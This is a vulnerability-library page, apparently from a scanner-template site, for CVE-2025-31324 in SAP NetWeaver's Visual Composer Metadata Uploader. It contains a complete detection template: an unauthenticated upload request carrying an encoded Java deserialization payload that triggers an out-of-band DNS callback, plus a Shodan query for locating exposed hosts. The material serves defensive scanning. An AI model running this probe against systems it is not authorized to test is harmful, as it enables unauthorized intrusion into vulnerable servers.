/Vulnerability Library

SAP NetWeaver Visual Composer Metadata Uploader - Deserialization

CVE-2025-31324
Verified

Description

SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

Severity

Critical

CVSS Score

10

Exploit Probability

42%

Published Date

April 26, 2025

Template Author

iamnoooob, rootxharsh, parthmalhotra
+1

CVE-2025-31324.yaml
id: CVE-2025-31324

info:
  name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  reference:
    - https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    - https://www.theregister.com/2025/04/25/sap_netweaver_patch/
    - https://me.sap.com/notes/3594142
    - https://url.sap/sapsecuritypatchday
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-31324
    cwe-id: CWE-434
    epss-score: 0.42049
    epss-percentile: 0.97275
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SAP NetWeaver Application Server Java"
  tags: cve,cve2025,sap,netweaver,rce,deserialization,kev,vkev,vuln

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"


http:
  - raw:
      - |
        POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data

        {{zip('.properties',replace(base64_decode('rO0ABXNyABRqYXZhLnV0aWwuUHJvcGVydGllczkS0HpwNj6YAgABTAAIZGVmYXVsdHN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHIAE2phdmEudXRpbC5IYXNodGFibGUTuw8lIUrkuAMAAkYACmxvYWRGYWN0b3JJAAl0aHJlc2hvbGR4cD9AAAAAAAADdwgAAAAFAAAAAnQADnByb2plY3QtbmF0dXJlc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAADHcIAAAAEAAAAAFzcgAMamF2YS5uZXQuVVJMliU3Nhr85HIDAAdJAAhoYXNoQ29kZUkABHBvcnRMAAlhdXRob3JpdHl0ABJMamF2YS9sYW5nL1N0cmluZztMAARmaWxlcQB+AAhMAARob3N0cQB+AAhMAAhwcm90b2NvbHEAfgAITAADcmVmcQB+AAh4cP//////////dAA2YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhdAAAcQB+AAp0AARodHRwcHh0AD1odHRwOi8vYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFheHQAC0VYUE9SVC1OQU1FdAATc29tZV9wcm9qZWN0X25hbWV4eHhw'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'FAILED', 'Cause')
        condition: and
# digest: 4a0a00473045022100cf647583d59ef9f589f55fdb85cab67f423e8a0ca38edb55c87ab91c5490bff702207cf75511f3ff72772995949b1d9fb09bf712309aeb9f335f5ae8e9dd55bd7cfd:922c64590222798bb761d5b6d8e72950
10.0Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVE ID:
cve-2025-31324
CWE ID:
cwe-434

References

https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/https://www.theregister.com/2025/04/25/sap_netweaver_patch/https://me.sap.com/notes/3594142https://url.sap/sapsecuritypatchday